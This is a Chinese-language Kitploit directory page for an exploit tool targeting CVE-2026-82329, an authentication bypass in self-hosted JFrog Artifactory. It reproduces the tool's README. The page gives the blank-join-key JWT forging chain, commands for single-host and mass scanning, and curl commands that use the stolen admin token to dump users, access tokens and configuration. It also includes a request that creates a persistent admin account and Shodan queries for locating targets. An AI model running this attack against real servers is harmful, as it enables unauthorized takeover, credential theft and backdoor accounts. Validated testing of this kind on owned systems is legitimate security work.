Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-82329-JFrog-Artifactory-Auth-Bypass — CVE-2026-82329 的漏洞利用程序,针对自托管 JFrog Artifactory 中未经身份验证的身份验证绕过漏洞,允许通过空白加入密钥接管管理员令牌。 | Kitploit
工具/GitHubGitHub/ynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass
身份验证与授权漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试
GitHubynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass

CVE-2026-82329-JFrog-Artifactory-Auth-Bypass

CVE-2026-82329 的漏洞利用程序,针对自托管 JFrog Artifactory 中未经身份验证的身份验证绕过漏洞,允许通过空白加入密钥接管管理员令牌。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
18小时50分前尚未审核

artifactory.py

artifactory.py — CVE-2026-82329 未授权管理员接管

root@kitploit:~
╔══════════════════════════════════════════════════════════╗
║  artifactory  ·  CVE-2026-82329 未授权管理员接管          ║
║  mitsec       ·  https://x.com/ynsmroztas                ║
╚══════════════════════════════════════════════════════════╝

CVE-2026-82329 — JFrog Artifactory(自托管)未授权 join-JWT
→ SERVICE admin 令牌 → 平台 applied-permissions/admin 访问令牌。

CVSS 9.8 · CWE-287 · CISA KEV · 已在野外被利用。

仅限授权测试。请勿对您不拥有或未经书面许可的系统运行此工具。


功能说明

默认自托管安装信任空白 join key。

root@kitploit:~
JoinKeyUtils.getSigningKey("")  ==  pkcs7(empty, 32)  ==  32 × 0x20
kid = SHA256("") = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

云托管版 JFrog 已修复。仅自托管版受影响。

Access 修复行:7.191.14。


安装

root@kitploit:~
# 仅使用标准库 — 无需 pip
python3 artifactory.py -h

TLS 验证默认关闭(自签名 Artifactory 属正常情况)。
无需额外参数。


使用方法

root@kitploit:~
# 单个主机
python3 artifactory.py -u https://artifactory.example.internal:8082

# 打印生成的管理员令牌
python3 artifactory.py -u https://TARGET:8082 --token

# 列表 / 管道(httpx、shodan、subfinder 风格)
python3 artifactory.py -l hosts.txt --threads 8
cat hosts.txt | python3 artifactory.py

# 仅 Pro / Enterprise — 持久化本地管理员(破坏性操作)
python3 artifactory.py -u https://TARGET:8082 --create-admin auditor:ChangeMe_1

输出

root@kitploit:~
[VULN]  https://TARGET:8082  join=201 svc_scp=admin admin token scp=applied-permissions/admin aud=* config=200/42020b tokens=200 version=7.161.19
[SAFE]  https://patched:8082  join HTTP 401  (已修复 / 无空白 key)
[FAIL]  https://dead:8082     无法访问
标签含义
VULN空白 join 被接受 + 管理员证明( 或令牌列表 = 200)

--token 打印 Bearer 值。这就是接管 — 登录用户是可选的。

--create-admin 在 OSS 上通常返回 400(PUT /artifactory/api/security/users 为 Pro 功能)。
管理员令牌仍然有效。持久化并非有效发现所必需。


命中后 — 使用令牌

替换 TARGET 并粘贴 --token 输出的令牌。

root@kitploit:~
TOKEN='eyJ...'          # --token 的输出
B='https://TARGET:8082'

# 版本 / 版本类型
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/version"

# 用户目录(管理员)
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v2/users"

# 实例上的所有访问令牌
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens" | head -c 400

# 仓库清单
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/repositories"

其他有用的管理员只读操作(未经授权请勿写入):

root@kitploit:~
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/configuration" -o config.xml

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/security/users"

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens"

UI:平台 → 使用访问令牌登录,或在每个请求中发送
Authorization: Bearer <token>。

可选持久化用户(Pro / Access v2)

root@kitploit:~
curl -sk -D- -X POST "$B/access/api/v2/users" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"auditor","email":"[email protected]","password":"ChangeMe_1Aa","admin":true}'

密码策略返回 400 ≠ 不受影响。令牌已具有 aud=*。


侦察

root@kitploit:~
# Shodan
http.component:"Artifactory" port:8081,8082
title:"Artifactory" "JFrog"
http.html:"/artifactory/webapp"
ssl.cert.subject.CN:"artifactory"

# 常见端口
8081  8082  8040  8046  443

工具会从 -u 中去除 /artifactory /ui /webapp,并与同一源上的 Access 路由器通信。


为什么 --create-admin 不是核心发现

报告影响为:未授权平台管理员令牌。
用户创建是后续操作,而非根本问题。


参考

  • NVD — CVE-2026-82329
  • JFrog 安全公告
  • 自管理版本 / 补丁
  • 实验室 + 补丁差异:dinosn/cve-2026-82329-jfrog-artifactory

免责声明

本仓库是用于您获授权测试的系统的验证工具。
在未经许可的第三方基础设施上生成令牌、列出用户或创建账户属违法行为。

补丁:升级到您分支的修复版本,设置真实的 join key,轮换披露后生成的令牌。


mitsec · @ynsmroztas

下载工具
步骤请求结果
1伪造 HS256 join JWT(iat 为当前时间,skip_node_registration=true)已知 HMAC 密钥
2POST /access/api/v1/registry/join201 SERVICE 令牌 scp=admin
3POST /access/api/v1/tokens200 管理员令牌 scp=applied-permissions/admin aud=*
4GET /artifactory/api/system/configuration仅管理员可访问的证明(未授权 = 401)
分支受影响版本 ≤修复版本
7.1117.111.207.111.21
7.1177.117.277.117.28
7.1257.125.197.125.20
7.1337.133.287.133.29
7.1467.146.377.146.38
7.1617.161.197.161.20
configuration
SAFEjoin 被拒绝 — 已修复、设置了额外 join keys,或非 Access
INFOjoin 已生成,但证明端点未返回 200 — 请手动检查
FAIL网络 / 超时
功能OSSPro / Enterprise
生成管理员访问令牌是是
读取配置 / 列出令牌 / 仓库是是
PUT /artifactory/api/security/users400 仅 Pro200/201
POST /access/api/v2/users取决于版本 / 策略201